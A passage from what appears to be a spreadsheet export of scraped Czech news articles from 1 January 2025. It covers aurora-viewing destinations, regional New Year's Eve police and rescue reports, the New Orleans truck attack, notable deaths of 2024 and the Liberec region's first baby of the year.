Zimní dovolená v chladných oblastech prostě má co do sebe. Ve většině skandinávských a finských měst za polárním kruhem si můžete zaplatit speciální tour, která vás za polární září doveze. Její operátoři hlídají předpovědi a vezmou vás na místa, odkud je dobře vidět. Mnoho z nich také nabízí možnost vyrazit podruhé zdarma, pokud se napoprvé lov nezdaří. Pokud jste však informovaní a máte případně k dispozici vlastní dopravu, zvládnete to i sami. Island Snad žádné jiné místo na světě nenabízí tolik přírodních divů na tak malém prostoru. Na Islandu se od pláží s černým pískem zvedají dramatické kopce a vulkány, které astronautům slouží jako tréninkové místo pro procházky ve vesmíru. Krása Islandu totiž skutečně vypadá jako z jiného světa. Hluboká údolí s působivými vodopády ještě více berou dech, pokud se nad nimi vlní polární záře. Tento přírodní jev je často vidět i v ulicích Reykjavíku . Ale mnohem lepší výhledy budete mít na neosvětlené pláni. Jedním z oblíbených míst pro pozorování polární záře je například laguna Jökulsárlón. Aurora se tady mihotá nad ledovcovou krajinou a odráží se ve vodních plochách. Marián Béreš vyfotil polární záři u rozhledny Kopaninka v Drahanské vrchovině. (13. srpna 2024) Na ostrově, který stvořila láva a oheň, jsem polární záři spatřila vůbec poprvé. Byl konec září, Island se pomalu halil do zimního hávu. Už zapadlo slunce, zatímco já jsem se ještě nahřívala v termálním bazénu. V ruce jsem třímala kelímek s pivem , atmosféra jiskřila veselým hovorem… když tu najednou zavládlo ticho a pohledy všech lidí v bazénu vylétly k nebi. Nad našimi hlavami se jako had ze starých vikinských mýtů plazila zelená polární záře. Dánsko Leží sice jižněji od polárního kruhu, aurora borealis ale častokrát zavítá i sem. Pozorovat polární záři můžete například na rozlehlých plážích v severním Jutsku, kde vás nebude rušit světelný smog. Dalšími dvěma oblíbenými destinacemi jsou ostrov Samsø a Faerské ostrovy, které se dotýkají arktického pásu. Jde o místo, které návštěvníci vyhledávají zejména v létě. Zima tu však má své mrazivé kouzlo – zejména třpytí-li se vám nad hlavou polární záře. Česko Nemáte čas nebo možnosti vydat se do zahraničí? Nebojte se, o polární záři nejspíš nepřijdete ani u nás. Patrně nebude tak intenzivní jako v arktických oblastech, ale i malá záře se počítá. Chce to však o něco víc přípravy. Sledujte proto weby a různé diskusní skupiny, které vás na možnost výskytu polární záře dopředu upozorní. Praktické informace najdete například na webu astro. cz, který provozuje Česká astronomická společnost. Dostanete se tu k různým monitorům polární záře, popřípadě se do čtete, jak odhadnout, že se na nebi pravděpodobně objeví. Pokud všechno nasvědčuje tomu, že se aurora borealis zjeví i u nás, vyrazte se na její pozorování do míst bez světelného smogu. Tak šťastný lov! Skotsko Málokoho napadne v souvislosti s pozorováním polární záře Skotsko . Přesto je na severu Velké Británie pozorování záře poměrně běžné. Nejvyšší pravděpodobnost světelného úlovku budete mít na Shetlandách . Zdejší obyvatelé překřtili záři na mirrie dancers, tedy na mihotající se tanečníky. Na výskyt polární záře je tu menší spolehnutí než za polárním kruhem. Avšak Shetlandy nabízejí malé světelné znečištění a kouzelnou krajinu, nad kterou se záře může prohánět. Nejlepší je spojit návštěvu ještě s další aktivitou. Vyrazit můžete třeba na festival Up Helly Aa, který se tradičně koná poslední úterý v lednu. Působivé ohnivé představení má připomínat ukončení vánoční sezony – městy procházejí průvody s loučemi a oslavy vrcholí spálením vikinské lodi. Jak polární záři objevit? Lovení polární záře není jenom tak. Zvyšte pravděpodobnost úspěchu pomocí našich tipů. Víc hlav (a aplikací) víc ví Sledujte aplikace, které vám dopředu řeknou, jaká je pravděpodobnost, že se polární záře objeví na nebi. Jde například o aplikace My Aurora Forecast &amp;amp; Alerts nebo Hello Aurora. Přidat se můžete také k nejrůznějším skupinám na facebooku, v nichž lidé sdílejí tipy. V Česku najdete například skupinu Polární záře v ČR a SK nebo Lovci polární záře, v níž Češi šíří své fotky a videa z domova i ze světa. Dejte si pozor na počasí Kromě aplikací monitorujících polární záři se podívejte i na předpověď počasí, aby vám oblaka nezakalila výhled. Nejlepší na pozorování je jasná noc, při níž nebe neoslňuje úplněk. Lofoty , Norsko . Pro fotku polární záře se na pláž Uttakleiv vydávají lidé z celého světa. Také sem míří otužilci, kteří chtějí ozkoušet zdejší vodu, která má jen sedm stupňů Celsia, a z neopatrných plavců rychle vysaje život. Odjeďte od světelného smogu Vypravte se mimo pouliční osvětlení, které přebije jemné nuance polární záře. Najděte si například cestu uprostřed polí s širokým výhledem na temné nebe. Dopřejte polární záři čas Neutíkejte po pár minutách pozorování hned domů. Připravte si do termosky horký čaj a vyčkejte, než se začne skrz oblohu plazit polární had. Pokud si plánujete výlet za hranice, vyhraďte si na lovení polární záře několik večerů, abyste ji neminuli. Polární záře byla v tomto roce k vidění ve Velké Británii . Autor: ČTK Lofoty , Norsko . Pro fotku polární záře se na pláž Uttakleiv vydávají lidé z celého světa. Také sem míří otužilci, kteří chtějí ozkoušet zdejší vodu, která má jen sedm stupňů Celsia, a z neopatrných plavců rychle vysaje život. Autor: Profimedia.cz Polární záře nad Tromsø Autor: Sennheiserz, Creative Commons Polární záře pozorovaná v Chrástu u Plzně . (10. května 2024) Autor: Géc Daniel, MAFRA Slabou polární záři zachytil fotoaparátem na Křížovém vrchu v Nízkém Jeseníku i Martin Bokůvka. Všiml jsem si jí až doma na počítači, napsal. (12. srpna 2024) Autor: Martin Bokůvka Takto viděla polární záři nad Pradědem Hana Zelinková. (13. srpna 2024) Autor: Hana Zelinková Takto zachytil polární záři nad Vysokým nad Jizerou Pavel Vítek . (13. srpna 2024) Autor: Pavel Vítek Marián Béreš vyfotil polární záři u rozhledny Kopaninka v Drahanské vrchovině. (13. srpna 2024) Autor: Marián Béreš Panoramatický snímek nazvaný Oblouk polární záře nad Mikulovem pořídil břeclavský fotograf Vlastimil Vojáček v noci z 10. na 11. května 2024 snímačem Canon EOS R6. Autor: Vlastimil Vojáček Zřetelné pásy polární záře osvětlily oblohu na okraji Prahy Autor: iDNES.cz Hesse, Nahe Treisberg: Na noční obloze se nad Pferdskopfem u Treisbergu v okrese Hochtaunus v Hesensku objevuje polární záře. Autor: ČTK Snímek polární záře nad Brněnskou přehradou získal ocenění České astrofotografie měsíce za listopad 2023. Autor: Vojtěch Otruba, Česká astronomická společnost Polární záře nad Vltavou v Roztokách u Prahy . (10. října 2024) Autor: Jiří Bezchleba Polární záře je jeden z nejkrásnějších úkazů, jaký si smrtelník může vychutnat. I za tímto jevem Petr Horálek vycestoval, aby jej zaznamenal s pohádkovou krajinou severního Norska Autor: Petr Horálek , archiv Polární záře nad Tromso Autor: Depositphotos Polární záře nad Laponskem ve Finsku (14. února 2019) Autor: Reuters Magie polární záře. Tak ji příroda vykouzlila nad Aljaškou . Autor: Profimedia.cz Polární záře je něco, na co návštěvník Islandu do smrti nezapomene. Autor: Jan Sucharda 250° panorama polární záře na Islandu Autor: Larryn Rae, zdroj: Královská greenwichská observatoř Polární záře je vidět na obloze nad Kirunou 7. března 2024 ve švédské Kiruně . Tato oblast je všeobecně považována za jedno z nejlepších míst na světě pro pozorování tohoto jevu, který vzniká při dopadu energetických částic ze Slunce na horní vrstvy zemské atmosféry. Autor: Leon Neal, Getty Images AURORA. Polární záře na jižní polokouli, tzv. aurora australis, osvěcuje nebe nad výzkumnou stanicí v Antarktidě. Autor: Patrick Cullis / NOAA , AP POLÁRNÍ ZÁŘE. Fotograf agentury Reuters Alexander Kuznetsov 7. října zachytil polární záři na městem Rovaniemi v Laponsku . Rovaniemi je jedno z oblíbených míst pro pozorování polární záře. Ve městě ji lze sledovat od poloviny srpna do začátku dubna. Autor: Alexander Kuznetsov , Reuters Autor: Petra Kejklíčková Autor person Petra Kejklíčková Rubrika transition_slide Cestování - Kolem světa</t>
  </si>
  <si>
    <t>943850</t>
  </si>
  <si>
    <t>20250101_166_3695924712_e1b1e1ea911fddc4b583.html</t>
  </si>
  <si>
    <t>e1b1e1ea911fddc4b583</t>
  </si>
  <si>
    <t>Příchod nového roku z pohledu policistů v Ústeckém kraji</t>
  </si>
  <si>
    <t>Příchod nového roku z pohledu policistů v Ústeckém kraji Foto: Policie ČR Ústecký kraj Jako každý rok, tak i letos se policisté v Ústeckém kraji připravovali na oslavy v souvislosti s přechodem do nového roku. V rámci celorepublikového opatření dohlíželi na hladký průběh silvestrovské noci, ale i na různé kulturní akce a koncerty. Během silvestrovské noci přijali na operačním středisku Krajského ředitelství policie Ústeckého kraje 206 telefonních hovorů na tísňovou linku 158. V loňském roce to bylo 200. Policisté v Ústeckém kraji řešili zpravidla slovní i fyzické potyčky, kde zpravidla hlavní roli sehrál alkohol . Naštěstí během těchto potyček nebyl nikdo vážně zraněn a v rámci šetření se jednalo o přestupková jednání a přečin výtžnictví. Po celém kraji bylo nahlášeno několik požárů kontejnerů. V obci Černěves na Litoměřicku zasahovali policisté spolu s hasiči u požáru pokoje v rodinném domě, kdy podle prvotních zjištění se od přímotopu vznítily okolní věci. Došlo ke škodě na majetku, ale naštěstí se událost obešla bez zranění. Několik osob vyhrožovalo sebevraždou, ti skončili v péči lékařů. V souvislosti se zábavní pyrotechnikou došlo k vážnému úrazu osoby v Mostě . Nalezená petarda měla za následek utržené prsty a část dlaně. Osobu si převzali do péče záchranáři. Během silvestrovské noci nedošlo k žádné tragické dopravní nehodě. por. Bc. Ilona Gazdošová Policie ČR Foto: Policie ČR + HZS Ústeckého kraje Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Ilona Gazdošová Autor person Ilona Gazdošová</t>
  </si>
  <si>
    <t>20250101_167_3695921374_bafb68a79d338d03997f.html</t>
  </si>
  <si>
    <t>bafb68a79d338d03997f</t>
  </si>
  <si>
    <t>VIDEO: Novoroční horor v New Orleans. Řidič najel do davu. Nejméně deset mrtvých</t>
  </si>
  <si>
    <t>VIDEO: Novoroční horor v New Orleans . Řidič najel do davu. Nejméně deset mrtvých HOROR V NEW ORLEANS 1. ledna 2025 Sdílet: V americkém New Orleans zažili katastrofální začátek roku. Kolem třetí hodiny ranní tamního času (10 hodin našeho času) tam řidič najel do davu lidí. Místní policie uvedla, že mrtvých je nejméně deset. Informuje například The New York Post. CNN později uvedla, že útočník byl zastřelen. Na sociálních sítích se objevují drastická videa ulice Bourbon street, na které leží řada těl mrtvých nebo vážně zraněných lidí. Podle Fox News je zraněných nejméně 35 lidí. At least one fatality and multiple casualties after driver ploughed into a group of people on Bourbon Street New Orleans. pic.twitter.com/4v9LrcTy63 — Imtiaz Mahmood (@ImtiazMadmood) January 1, 2025 Média také uvádí, že podezřelý následně z auta vystoupil a začal střílet. Policisté na místě jeho střelbu měli opětovat. "Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to úmyslné chování," řekla novinářům šéfka neworleanské policie Anne Kirkpatricková. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Kirkpatricková neuvedla, zda je muž ve vazbě, či zda byl také zraněn. Většina ze 35 zraněných jsou podle ní místní obyvatelé, nikoli návštěvníci města. Server CNN později odpoledne našeho času uvedl, že útočník byl podle nejmenovaných policejních zdrojů média zastřelen. „Podezřelým (ze spáchání činu) je Shamsud Din Jabbar,“ informovala později americká stanice NBC. Podle ní jde o 42letého muže, kterého FBI podezírá z teroristického činu. Americká CNN s odvoláním na zdroje z bezpečnostní komunity napsala, že muž měl u sebe při útoku vlajku Islámského státu. Ondřej Šmigol KOMENTÁŘ Záchranáři potvrdili, že vozidlo zranilo lidi u ulic Bourbon a Canal street. Nákladní auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že město New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Americký prezident Joe Biden v prohlášení Bílého domu uvedl, že nařídil vyčlenit veškeré zdroje potřebné pro vyšetření případu. Uvedl také, že žádný útok na Američany nebude tolerován a že násilí v jakékoliv podobě není ospravedlnitelné. Zvolený prezident Donald Trump , který se úřadu ujme 20. ledna, útok bez konkrétních podrobností spojil s nelegální migrací. Svůj příspěvek ohledně událostí v New Orleans začal větou, že "příchozí zločinci jsou daleko horší než zločinci, které máme v naší zemi". Neuvedl ale, jak tento případ souvisí s migrací. "Naše ambasáda i honorární konzul v New Orleans jsou v kontaktu s místními úřady a situaci monitorují. Nemáme informace o tom, že by se nešťastná událost nějak dotkla českých občanů," sdělil ČTK mluvčí české diplomacie Drake. Jan Křovák , 1. ledna 2025 NOVOROČNÍ PROJEV USA automobily policie Související články Autor: max Autor person max Rubrika transition_slide Svět</t>
  </si>
  <si>
    <t>164200</t>
  </si>
  <si>
    <t>121850</t>
  </si>
  <si>
    <t>20250101_168_3696853950_68c3f0dcffb35edbd945.html</t>
  </si>
  <si>
    <t>68c3f0dcffb35edbd945</t>
  </si>
  <si>
    <t>Silvestrovská noc v Plzeňském kraji pohledem záchranných složek</t>
  </si>
  <si>
    <t>Silvestrovská noc v Plzeňském kraji pohledem záchranných složek 1. 1. 2025 Oslavy nového roku v Plzeňském kraji. Foto: Unsplash Letošní oslavy nového roku proběhly poněkud v poklidu. Alespoň v Plzeňském kraji , kde byla oproti minulým o něco klidnější. Záchranáři v Plzeňském kraji si oddechli - letošní silvestrovská noc byla oproti předchozím rokům výrazně klidnější. Podle Andrey Divišové, mluvčí záchranné služby, vyjížděly posádky zhruba ke dvaceti případům spojeným s oslavami Nového roku, přičemž žádný z nich nebyl vážný. „Letošní silvestrovské oslavy proběhly pro naše záchranáře klidněji než v předchozích letech. Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti," uvedla tisková mluvčí záchranné služby Andrea Divišová. Co se týče zranění způsobených pyrotechnikou, zaznamenali pouze dva lehčí případy. Objevilo se také několik drobných incidentů spojených s opilostí či napadením, které řešili společně s policií. I policisté hlásí klidný průběh silvestrovské noci. Jejich mluvčí Michaela Raindlová potvrdila, že v Plzeňském kraji nedošlo k žádným mimořádným událostem. Většina oznámení, která během noci přijali, se týkala především podnapilých osob. „Silvestr proběhl v Plzeňském kraji bez mimořádných událostí. Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu ,“ prozradila mluvčí policie Michaela Raindlová. Zdroje: autorský text Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20250101_169_3695917405_87ebaa8bfc10720ab797.html</t>
  </si>
  <si>
    <t>87ebaa8bfc10720ab797</t>
  </si>
  <si>
    <t>Silvestr pohledem pardubických strážníků. Záchytka vyčerpala své kapacity hned zkraje večera</t>
  </si>
  <si>
    <t>Silvestr pohledem pardubických strážníků. Záchytka vyčerpala své kapacity hned zkraje večera Foto: MP Pardubice Pardubický kraj Poslední noční služba roku 2024 v Pardubicích byla pro strážníky pestrá. Hned první výjezd na krátce po začátku služby byl na 14letého chlapce, který byl pod silným vlivem alkoholu . Nadýchal 1,55 promile a vzhledem ke stavu, ve kterém se nacházel, počkal v péči záchranné služby do příjezdu zákonných zástupců. Poté přišla špatná zpráva. Pardubická záchytka vyčerpala své kapacity hned zkraje večera. Adeptem na umístění totiž byl opilý muž z Ostravska , který hlídky strážníků i policistů zaměstnával průběžně od časného večera až do půlnoci. Svým nesnesitelným jednáním vyvolal postupně několik konfliktů, kde pak ještě následnými oznámeními a stížnostmi zaměstnával strážníky a policisty, na které chrlil urážky. Toto počínání by mu normálně zaručilo místo na záchytné stanici, jenže ta už byla plná. Postupem večera se tento problémový muž odebral na nádraží a jeho počínáním se nakonec bude zabývat správní orgán. Prvními výjezdy roku 2025 bylo probuzení a vykázání opilého muže z vagonu v železničním depu u hlavního nádraží. Vzápětí dvě hlídky vyjely k požáru kontejneru na sídlišti Dubina. Strážníci před příjezdem hasičů zkontrolovali, že se v kontejnerovém stání nenachází žádné osoby a odtáhli požárem nezasažené popelnice od ohně. O zbytek se pak postarali pardubičtí hasiči. Chvíli po půlnoci museli policisté a strážníci rychle krotit vášně na třídě Míru. Tam do hostů před barem začala strkat procházející skupina 15 fotbalových chuligánů mířících na vlak do Prahy . Strážníci po tomto incidentu tuto skupinu doprovázeli až k nádraží, aby nedošlo k dalším konfliktům. Těsně před třetí hodinou ráno vyjeli strážníci na Signál v tísni. Seniorka ročník 1941 si pomocí nouzového tlačítka přivolala pomoc. Strážníci vstoupili do bytu, zkontrolovali ženin stav a vzhledem k seznamu obtíží přivolali na místo posádku záchranné služby. Jiří Sejkora MP Pardubice Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Jiří Sejkora Autor person Jiří Sejkora</t>
  </si>
  <si>
    <t>20250101_17_3698124060_75ec7ca0a5e6d3e27c3a.html</t>
  </si>
  <si>
    <t>75ec7ca0a5e6d3e27c3a</t>
  </si>
  <si>
    <t>Profesorka McGonagallová i Brenda Walshová: Slavní, kteří odešli v roce 2024</t>
  </si>
  <si>
    <t>Profesorka McGonagallová i Brenda Walshová: Slavní, kteří odešli v roce 2024 Foto: Super.cz, Profimedia.cz 1. 1. 2025, 21:22 Článek V roce 2024 nás bohužel opustilo mnoho skvělých herců a hereček i dalších známých osobností. Pojďme na některé z nich zavzpomínat. V 86 letech zemřel americký herec Ron Ely, který se nejvíce proslavil hlavní rolí v televizním seriálu z 60. let Tarzan. Rodinu herce, který si rovněž zahrál ve filmech Muž z bronzu či Křik černých vlků, poznamenala v roce 2019 obrovská tragédie. Ronův syn Cameron ubodal svou matku a hercovu manželku Valerii. Policisté následně Camerona zastřelili. Až později se ukázalo, že Cameron trpěl ranými stadii duševního onemocnění CTE (Chronická traumatická encefalopatie). Manželé měli kromě syna ještě dvě dcery. Foto: Profimedia.cz Ron Ely NEJTRAGIČTĚJŠÍ ÚMRTÍ ROKU 2024 Ve věku nedožitých 71 let zemřel americký zpěvák Tito Jackson . Jeden z bratrů Michaela Jacksona , který býval rovněž členem kapely Jackson 5, prodělal infarkt v autě při cestě z Nového Mexika do Oklahomy . Foto: Profimedia.cz Tito Jackson Loni svět přišel také o jeden z největších hereckých sex-symbolů, ve věku 88 let zemřel Alain Delon (†88), jehož fotografie zdobily v 50. a 60. letech minulého století pokojíčky tisíců žen a dívek po celém světě. První vážné obavy o hercovo zdraví se objevily v roce 2017, kdy mu v rámci pětihodinové operace srdce byl do těla voperován bypass. V roce 2019 herec prodělal dvojnásobnou mrtvici. Podstoupil operaci v pařížské nemocnici, poté tam byl tři týdny hospitalizován na jednotce intenzivní péče. Následně byl převezen na kliniku do Švýcarska , kde se doléčil. Letos jeho syn Anthony Delon oznámil, že otci byla diagnostikovaná rakovina. Herec dokonce zvažoval eutanazii. Foto: Profimedia.cz Alain Delon Poslední roky Alaina Delona : Prodělal mrtvici a rakovinu, zvažoval eutanazii. Rozhodla se pro ni i hercova první žena Ve věku 88 let zemřel kanadský herec Donald Sutherland . Proslavil se například ve filmech MASH, Tucet špinavců nebo Obyčejní lidé. Objevil se i v sérii Hunger Games. Donald Sutherland měl za sebou více než 60 let trvající hereckou kariéru a zahrál si ve více než 170 filmech a seriálech. Získal dva Zlaté glóby a čestného Oscara. Byl třikrát ženatý a měl pět dětí. Podle blízkých herec zemřel po dlouhé nemoci. Foto: Profimedia.cz Donald Sutherland Po pětiletém boji s onemocněním ALS (amyotrofická laterální skleróza) zemřel herec Kenneth Mitchell , známý mimo jiné ze seriálů Star Trek: Discovery či Jericho . Rodákovi z Toronta bylo onemocnění diagnostikováno v srpnu 2018, o rok později začal používat invalidní vozík. Zůstala po něm manželka a dvě děti. Foto: Profimedia.cz Kenneth Mitchell Po osmnáctiletém boji s Parkinsonovou chorobou letos zemřela legenda ze seriálu Pobřežní hlídka Michael Newman. Bylo mu 68 let. Newman si zahrál ve 150 epizodách Pobřežní hlídky, víc jich natočil jen David Hasselhoff , a byl jediný, kdo byl záchranářem i ve skutečném životě. Původně začal na seriálu spolupracovat jako konzultant a poradce, který měl herce naučit správným pohybům. Později si zahrál jednu z hlavních postav, v podstatě sám sebe, plavčíka Mikea. Dlouhá léta působil jako hasič, a to i během natáčení a po skončení seriálu. Foto: Profimedia.cz Michael Newman Loni nás opustila také slavná britská herečka Maggie Smith (†89). Diváci ji znali jako profesorku Minervu McGonagallovou z Harryho Pottera či jako hraběnku Violet v Panství Downton. Maggie Smith byla dvakrát vdaná. Jejím prvním mužem byl herec Robert Stephens , s nímž měla dvě děti, syny Christophera a Tobyho. Oba se věnují herectví. Manželství v roce 1974 skončilo rozvodem. Hereččiným druhým manželem byl dramatik Beverley Cross , jenž v roce 1999 zemřel. Foto: Profimedia.cz Maggie Smith Ve věku 72 let zemřela americká herečka Susan Buckner, známá mimo jiné z muzikálového hitu z roku 1978 Pomáda. Susan v Pomádě ztvárnila Patty Simcox, jednu ze školních roztleskávaček, která se spřátelila se Sandy, již hrála hlavní ženská herecká hvězda filmu Olivia Newton - John . Olivia zemřela po dlouhém boji s rakovinou v srpnu 2022. Foto: Profimedia.cz Zleva Jamie Donnelly, Olivia Newton - John a Susan Buckner v Pomádě Lékař Brendy z Beverly Hills popsal její poslední chvíle na tomto světě. Z jeho slov mrazí Po dlouhém boji se zákeřnou rakovinou letos zemřela herečka Shannen Doherty (†53), známá především jako Brenda Walshová z kultovního seriálu Beverly Hills 90210. Bylo jí 53 let. Poprvé jí byla rakovina prsu diagnostikována v roce 2015, dva roky byla v remisi, v roce 2020 ale herečka oznámila, že se nemoc vrátila a bohužel se postupně rozšířila i do mozku a kostí. Svůj boj herečka celou dobu otevřeně sdílela se svými fanoušky na sociálních sítích, za což ji mnozí chválili a vyjadřovali jí podporu, která jí dodávala sílu se s rakovinou dál prát. Foto: Profimedia.cz Shannen Doherty V pouhých 31 letech zemřel zpěvák a bývalý člen mimořádně populární kapely One Direction Liam Payne (†31). Mrtvého jej našli po pádu ze třetího podlaží hotelu v Buenos Aires . Podle svědků, kteří byli přítomni jeho posledním chvílím, se Payne choval „nevyzpytatelně“. Argentinská policie dokonce přijala telefonát z hotelu CasaSur Palermo, kde byl zpěvák ubytován, jeden z pracovníků nahlásil „agresivního muže, který by mohl být pod vlivem drog a alkoholu “. Drogy se v jeho těle později také našly. Po zpěvákovi zůstal sedmiletý syn. Foto: Profimedia.cz Autor: Lucie Sieglová Autor person Lucie Sieglová</t>
  </si>
  <si>
    <t>20250101_170_3695930847_18b0e403bbaf8a801d66.html</t>
  </si>
  <si>
    <t>18b0e403bbaf8a801d66</t>
  </si>
  <si>
    <t>Silvestrovská noc na Vysočině: Záchranné složky měly napilno, hasiči zaznamenali méně požárů</t>
  </si>
  <si>
    <t>Silvestrovská noc na Vysočině: Záchranné složky měly napilno, hasiči zaznamenali méně požárů Začal rok 2025 a jeho příchod lidé na Vysočině oslavili tradičně hlučným odpalováním ohňostrojů, petard a s pohárkem alkoholu v ruce. Pro záchranné složky to znamenalo být v pohotovosti. Záchranka: 62 výjezdů, intoxikace i úrazy z pyrotechniky Zdravotnická záchranná služba Vysočina během silvestrovské noci evidovala celkem 62 výjezdů. Třetina z nich, tedy 23 případů, souvisela přímo s oslavami. Nejčastějšími důvody byly úrazy při manipulaci s pyrotechnikou, kterých bylo jedenáct. „Mezi zraněnými byli lidé s popáleninami a tržnými ranami, které si způsobili petardami nebo rachejtlemi,“ upřesnil mluvčí záchranné služby Petr Janáček. K intoxikaci alkoholem museli zdravotníci vyjet celkem šestkrát. Počet zásahů byl podobný jako před rokem, což podle záchranných složek ukazuje na stabilní situaci v kraji. Hasiči: Počet požárů klesl na polovinu Hasiči na Vysočině letos zaznamenali klidnější noc než v minulém roce. Vyjeli k osmi událostem, přičemž čtyři zásahy se týkaly požárů. V roce 2024 museli zasahovat u devíti požárů během 14 výjezdů. Největší škodu způsobilo vzplanutí zahradních přístřešků ve Stojčíně na Pelhřimovsku. "Příčina požáru je v šetření, ale předběžně se jedná o škodu ve výši 400 tisíc korun," uvedl mluvčí krajských hasičů. V dalších případech šlo o požáry krabic od pyrotechniky nebo kontejnerů. Policie: Čísla odpovídají minulým letům, incidenty i pátrání po lidech Policie na Vysočině zaznamenala přes sto oznámení. Případy zahrnovaly dopravní nehody, přestupky i trestné činy. „Například u Lukova na Třebíčsku zasahovala hlídka kvůli dopravní nehodě pod vlivem alkoholu ,“ informovala policejní mluvčí Jana Kroutilová . Policisté často zasahovali u podnapilých osob. V Jihlavě museli zadržet muže, který se pokoušel ukrást alkohol . V Pelhřimově byl jiný muž nalezen v podchlazeném stavu ležící na chodníku. Noc na Nový rok si vyžádala i dvě pátrací akce. V prvním případě se jednalo o seniorku z Třebíčska, kterou našli podchlazenou v lese. Druhý případ se týkal ženy z Havlíčkova Brodu , která utekla ze zdravotnického zařízení. Policie ji nalezla v Chotěboři . Podle záchranných složek proběhl příchod nového roku na Vysočině bez vážnějších incidentů, avšak v pohotovosti budou i v nadcházejících dnech. Autor: Tereza Pešoutová Autor Tereza Pešoutová Rubrika transition_slide Zprávy z Vysočiny</t>
  </si>
  <si>
    <t>3180</t>
  </si>
  <si>
    <t>3620</t>
  </si>
  <si>
    <t>20250101_171_3695979787_62427438e31e4e98dcd2.html</t>
  </si>
  <si>
    <t>62427438e31e4e98dcd2</t>
  </si>
  <si>
    <t>Zprávy z Vysočiny: Silvestrovská noc na Vysočině: Záchranné složky měly napilno, hasiči zaznamenali méně požárů</t>
  </si>
  <si>
    <t>20250101_172_3695955005_a1c25452d07399dae2d6.html</t>
  </si>
  <si>
    <t>a1c25452d07399dae2d6</t>
  </si>
  <si>
    <t>20250101_173_3695907234_50b9119b2f2449f42691.html</t>
  </si>
  <si>
    <t>50b9119b2f2449f42691</t>
  </si>
  <si>
    <t>První miminko Libereckého kraje roku 2025 je z Turnova!</t>
  </si>
  <si>
    <t>První miminko Libereckého kraje roku 2025 je z Turnova ! Nacházíte se: Úvod » Aktuality » První miminko Libereckého kraje roku 2025 je z Turnova ! Ilustrační snímek centra Turnova 1.1.2025 | 3 336 přečtení Aktuality (Aktualizace) Prvním miminkem roku 2025 narozeným v Libereckém kraji je Adélka. Na svět přišla v Nemocnici v Jablonci nad Nisou , narodila se pět minut po půlnoci na Nový rok. Váží 2 335 gramů. Rodiče jsou z Turnova a je to jejich první děťátko. První děti narozené v Libereckém kraji dostanou stejně jako v minulých letech od hejtmana Martina Půty pamětní zlatý dukát a k tomu pět tisíc korun a dětskou kosmetiku. O silvestrovské noci měli v Libereckém kraji napilno hlavně záchranáři, kteří během noci řešili zhruba 260 událostí. Policisté poslední noc v roce hodnotí jako spíše poklidnou, hasiči zaznamenali dvě desítky výjezdů, vesměs k hořícím kontejnerům. Podle Terezy Bezručové z turnovské městské policie proběhla přímo v Turnově silvestrovská noc relativně v poklidu. První vážnější událost strážníci řešili nad ránem 31. prosince, kdy agresivní muž pod vlivem alkoholu napadal zdravotnický personál. Nakonec byl hospitalizován v nemocnici. V průběhu posledního dne v roce byla prováděna běžná kontrolní činnost, ve které strážníci pokračovali i v průběhu noci. O půlnoci se na náměstí sešly asi čtyři desítky lidí, kteří zde slavili příchod nového roku – létaly petardy a světlice. Situace ale byla obdobná jako každý rok. Po půlnoci hlídka na Koňském trhu zaznamenala silně se potácejícího muže, který sedal do auta za volant. Ve spolupráci se státní policií byl zadržen při výjezdu směrem na Jičín . Zpočátku se policistům snažil ujet. Nadýchal 1,5 promile. Zaznamenáno bylo letos také více ohňostrojů a petard kolem půlnoci. Silvestrovské oslavy probíhaly na několika místech ve městě, největší ohňostroj byl Na Lukách u Turnovské pivnice. Podle městské policie tady ale vše proběhlo bez problémů. (TvA s využitím ČTK ) Aktualizace: Ve čtvrtek 2. ledna byli přímo v nemocnici malé Adélce a jejím rodičům popřát vše nejlepší a předat věcné dary hejtman Libereckého kraje a primátor Jablonce nad Nisou (foto LK) Autor: Autor článku | TvA zpravodajství || TvA zpravodajství</t>
  </si>
  <si>
    <t>445</t>
  </si>
  <si>
    <t>439</t>
  </si>
  <si>
    <t>20250101_174_3695893925_89db117ab6c6e58fcc15.html</t>
  </si>
  <si>
    <t>89db117ab6c6e58fcc15</t>
  </si>
  <si>
    <t>Při novoročních oslavách se na Táborsku ztratil muž. Hledal ho vrtulník, nalezli jej ve vedlejší obci</t>
  </si>
  <si>
